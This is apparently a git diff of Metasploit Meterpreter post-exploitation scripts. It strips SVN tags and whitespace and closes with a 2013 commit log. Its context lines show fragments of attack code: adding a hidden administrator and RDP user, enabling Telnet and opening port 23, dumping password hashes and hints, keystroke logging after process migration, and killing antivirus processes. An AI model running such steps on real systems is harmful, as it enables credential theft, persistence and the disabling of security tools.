-	
+
 	path4users = ""
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")

@@ -1,6 +1,3 @@
-# $Id$
-# $Revision$
-
 # Meterpreter script that display local subnets
 # Provided by Nicob <nicob [at] nicob.net>
 # Ripped from http://blog.metasploit.com/2006/10/meterpreter-scripts-and-msrt.html
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 require "rexml/document"
@@ -145,7 +143,7 @@ end
 #Function to enumerate the users if running as SYSTEM
 def enum_users(os)
 	users = []
-	
+
 	path4users = ""
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")

@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$

 #copied getvncpw - thanks grutz/carlos

@@ -15,7 +13,7 @@ def usage()
 end

 def get_community(session)
-	key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"	
+	key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
 	root_key, base_key = session.sys.registry.splitkey(key)
 	open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
 	begin
@@ -37,7 +35,7 @@ end
 if client.platform =~ /win32|win64/
 	print_status("Searching for community strings...")
 	strs = get_community(session)
-	if strs	
+	if strs
 		strs.each do |str|
 			print_good("FOUND: #{str}")
 			@client.framework.db.report_auth_info(
@@ -50,7 +48,7 @@ if client.platform =~ /win32|win64/
 				:type	=> "snmp.community",
 				:duplicate_ok	=> true
 			)
-		end		
+		end
 	else
 		print_status("Not found")
 	end
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #
 # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
 # Provides also the option to kill the processes of detected products and disable the built-in firewall.
@@ -177,7 +175,7 @@ avs = %W{
 	oasclnt.exe
 	ofcdog.exe
 	opscan.exe
-	ossec-agent.exe	
+	ossec-agent.exe
 	outpost.exe
 	paamsrv.exe
 	pavfnsvr.exe
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -67,7 +65,7 @@ def enabletssrv()
 			file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"")
 			cmd_exec("sc start termservice")
 			file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc stop termservice\"")
-			
+
 		else
 			print_status "\tTerminal Services service is already set to auto"
 		end
@@ -83,7 +81,7 @@ end


 def addrdpusr(session, username, password)
-		
+
 	rdu = resolve_sid("S-1-5-32-555")[:name]
 	admin = resolve_sid("S-1-5-32-544")[:name]

@@ -100,7 +98,7 @@ def addrdpusr(session, username, password)
 			file_local_write(@dest,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
 			print_status "\tAdding User: #{username} to local group '#{rdu}'"
 			cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add")
-		
+
 			print_status "\tAdding User: #{username} to local group '#{admin}'"
 			cmd_exec("cmd.exe","/c net localgroup #{admin}  #{username} /add")
 			print_status "You can now login with the created user"
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -60,7 +58,7 @@ def insttlntsrv()
 			end
 			file_local_write(@dest,"execute -H -f cmd.exe -a \"/c ocsetup TelnetServer /uninstall\"")
 			print_status("Finished installing the Telnet Service.")
-			
+
 		end
 	elsif trgtos =~ /2003/
 		file_local_write(@dest,"reg setval -k \"HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\\" -v 'Start' -d \"1\"")
@@ -85,7 +83,7 @@ def enabletlntsrv()
 		# Enabling Exception on the Firewall
 		print_status "\tOpening port in local firewall if necessary"
 		cmd_exec('netsh firewall set portopening protocol = tcp port = 23 mode = enable')
-	
+
 	rescue::Exception => e
 		print_status("The following Error was encountered: #{e.class} #{e}")
 	end
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #----------------------------------------------------------------
 # Meterpreter script to obtain the VNC password out of the
 # registry and print its decoded cleartext
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #
 # Implement pwdump (hashdump) through registry reads + syskey

@@ -101,14 +99,14 @@ def capture_user_keys
 		users[usr.to_i(16)] ||={}
 		users[usr.to_i(16)][:F] = uk.query_value("F").data
 		users[usr.to_i(16)][:V] = uk.query_value("V").data
-		
+
 		#Attempt to get Hints (from Win7/Win8 Location)
 		begin
 			users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])
 		rescue ::Rex::Post::Meterpreter::RequestError
 			users[usr.to_i(16)][:UserPasswordHint] = nil
 		end
-		
+
 		uk.close
 	end
 	ok.close
@@ -120,9 +118,9 @@ def capture_user_keys
 		rid = r.type
 		users[rid] ||= {}
 		users[rid][:Name] = usr
-		
+
 		#Attempt to get Hints (from WinXP Location) only if it's not set yet
-		if users[rid][:UserPasswordHint].nil?	
+		if users[rid][:UserPasswordHint].nil?
 			begin
 				uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
 				users[rid][:UserPasswordHint] = uk_hint.query_value("").data
@@ -130,7 +128,7 @@ def capture_user_keys
 				users[rid][:UserPasswordHint] = nil
 			end
 		end
-		
+
 		uk.close
 	end
 	ok.close
@@ -262,9 +260,9 @@ if client.platform =~ /win32|win64/
 			if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
 				print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
 				hint_count += 1
-			end	
+			end
 		end
-		print_line("No users with password hints on this system") if hint_count == 0 
+		print_line("No users with password hints on this system") if hint_count == 0
 		print_line()

 		print_status("Dumping password hashes...")
@@ -280,9 +278,9 @@ if client.platform =~ /win32|win64/
 				:pass  => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
 				:type  => "smb_hash"
 			)
-			
+
 			print_line hashstring
-			
+
 		end
 		print_line()
 		print_line()
@@ -298,4 +296,4 @@ if client.platform =~ /win32|win64/
 else
 	print_error("This version of Meterpreter is not supported with this Script!")
 	raise Rex::Script::Completed
-end
+end
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Meterpreter script for modifying the hosts file in windows
 # given a single entrie or several in a file and clear the
 # DNS cache on the target machine.
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 # Updates by Shellster
 #-------------------------------------------------------------------------------
@@ -75,7 +73,7 @@ def explrmigrate(session,captype,lock,kill)
 			print_status("\t#{process2mig} Process found, migrating into #{x['pid']}")
 			session.core.migrate(x['pid'].to_i)
 			print_status("Migration Successful!!")
-			
+
 			if (kill)
 				begin
 					print_status("Killing old process")
@@ -149,7 +147,7 @@ def keycap(session, keytime, logfile)
 		rec = 1
 		#Creating DB for captured keystrokes
 		file_local_write(logfile,"")
-		
+
 		print_status("Keystrokes being saved in to #{logfile}")
 		#Inserting keystrokes every number of seconds specified
 		print_status("Recording ")
@@ -187,7 +185,7 @@ kill = false
 	when "-l"
 		lock = true
 	when "-k"
-		kill = true	
+		kill = true
 	end
 }
 if client.platform =~ /win32|win64/
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #
 # Meterpreter script that kills all Antivirus processes
 # Provided by: Jerome Athias <jerome.athias [at] free.fr>
@@ -1,6 +1,3 @@
-# $Id$
-# $Revision$
-
 #
 # Meterpreter script for installing the meterpreter service
 #
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #
 # Simple example script that migrates to a specific process by name.
 # This is meant as an illustration.
@@ -1,10 +1,8 @@
-# $Id$
 #
 # Meterpreter script for running multiple console commands on a meterpreter session
 # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
 # Verion: 0.1
 #
-# $Revision$

 ################## Variable Declarations ##################
@client = client
@@ -48,7 +46,7 @@ end
 ################## Main ##################
@@exec_opts.parse(args) { |opt, idx, val|
 	case opt
-		
+
 	when "-cl"
 		commands = val.split(",")
 	when "-rc"
@@ -60,7 +58,7 @@ end
 				commands << line.chomp
 			end
 		end
-		
+
 	when "-h"
 		help = 1
 	end
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #Meterpreter script for running multiple commands on Windows 2003, Windows Vista
 # and Windows XP and Windows 2008 targets.
 #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #Meterpreter script for running multiple scripts on a Meterpreter Session
 #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
 #Verion: 0.2
@@ -125,7 +125,6 @@ def reverselookup(session, iprange, dest)
 		end
 	rescue ::Exception => e
 		print_status("The following error was encountered: #{e.class} #{e}")
-
 	end
 end

@@ -220,7 +219,6 @@ def pingsweep(session, iprange, dest)
 		end
 	rescue ::Exception => e
 		print_status("The following error was encountered: #{e.class} #{e}")
-
 	end
 end
 #-------------------------------------------------------------------------------
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 #
 # Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
 # keys. This script requires you to be running as system in order to work properly. This has currently been
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Tod Beardsley	22fce04120	Unicode fix for MSIE theme exploit	2013-09-23 14:23:14 -05:00
Tod Beardsley	18720b6063	Extra staging commits: Meterpreter, bug fixes, etc This is a squash of recent fixes to Metasploit Framework since the last release: * Update of the Meterpreter binaries [FixRM #8364] * Update to Meterpreter ruby components [FixRM #8395] * Update to test scripts * Update to msftidy and retab tools * Updates ASM source for block_reverse_https.asm * Removes Id and Version SVN tags from scripts/meterpreter * Adds a longer travis timeout * Avoids an rbenv annoyance recently introduced	2013-09-23 14:16:13 -05:00
Tod Beardsley	157d24c81c	Checkout new modules This is the set of modules for this week's staging update.	2013-09-23 14:13:49 -05:00
Tod Beardsley	9b3c80fcdf	Clear report_data on each host report	2013-09-23 11:32:39 -05:00